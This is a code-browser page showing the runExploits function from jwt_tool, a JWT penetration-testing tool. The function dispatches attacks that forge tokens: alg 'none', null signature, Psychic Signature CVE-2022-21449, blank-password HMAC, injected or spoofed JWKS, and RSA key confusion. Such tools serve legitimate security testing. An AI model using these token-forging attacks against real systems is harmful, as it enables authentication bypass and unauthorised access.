MCPcopy
hub / github.com/ticarpi/jwt_tool / runExploits

Function runExploits

jwt_tool.py:1740–1783  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

1738
1739
1740def runExploits():
1741 if args.exploit:
1742 if args.exploit == "a":
1743 noneToks = checkAlgNone(headDict, paylB64)
1744 zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""]))
1745 for noneTok in zippedToks:
1746 desc = "EXPLOIT: "+zippedToks[noneTok]+" - this is an exploit targeting the debug feature that allows a token to have no signature\n(This will only be valid on unpatched implementations of JWT.)"
1747 jwtOut(noneTok, "Exploit: "+zippedToks[noneTok], desc)
1748 elif args.exploit == "n":
1749 jwtNull = checkNullSig(contents)
1750 desc = "EXPLOIT: null signature\n(This will only be valid on unpatched implementations of JWT.)"
1751 jwtOut(jwtNull, "Exploit: Null signature", desc)
1752 elif args.exploit == "p":
1753 jwtPsy = checkPsySig(headDict, paylB64)
1754 desc = "EXPLOIT: Psychic Signature (CVE-2022-21449)\n(This will only be valid on unpatched implementations of JWT.)"
1755 jwtOut(jwtPsy, "Exploit: Psychic Signature (CVE-2022-21449)", desc)
1756 elif args.exploit == "b":
1757 key = ""
1758 newSig, newContents = signTokenHS(headDict, paylDict, key, 256)
1759 jwtBlankPw = newContents+"."+newSig
1760 desc = "EXPLOIT: Blank password accepted in signature\n(This will only be valid on unpatched implementations of JWT.)"
1761 jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature", desc)
1762 elif args.exploit == "i":
1763 newSig, newContents = jwksEmbed(headDict, paylDict)
1764 desc = "EXPLOIT: injected JWKS\n(This will only be valid on unpatched implementations of JWT.)"
1765 jwtOut(newContents+"."+newSig, "Injected JWKS", desc)
1766 elif args.exploit == "s":
1767 if config['services']['jwksloc']:
1768 jku = config['services']['jwksloc']
1769 else:
1770 jku = config['services']['jwksdynamic']
1771 newContents, newSig = exportJWKS(jku)
1772 if config['services']['jwksloc'] and config['services']['jwksloc'] == args.jwksurl:
1773 cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks'])+"", "cyan")
1774 desc = "Signed with JWKS at "+jku
1775 jwtOut(newContents+"."+newSig, "Spoof JWKS", desc)
1776 elif args.exploit == "k":
1777 if config['crypto']['pubkey']:
1778 newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey'])
1779 desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)"
1780 jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc)
1781 else:
1782 cprintc("No Public Key provided (-pk)\n", "red")
1783 parser.print_usage()
1784
1785def runActions():
1786 if args.tamper:

Callers 2

tamperTokenFunction · 0.85
runActionsFunction · 0.85

Calls 9

checkAlgNoneFunction · 0.85
jwtOutFunction · 0.85
checkNullSigFunction · 0.85
checkPsySigFunction · 0.85
signTokenHSFunction · 0.85
jwksEmbedFunction · 0.85
exportJWKSFunction · 0.85
cprintcFunction · 0.85
checkPubKeyExploitFunction · 0.85

Tested by

no test coverage detected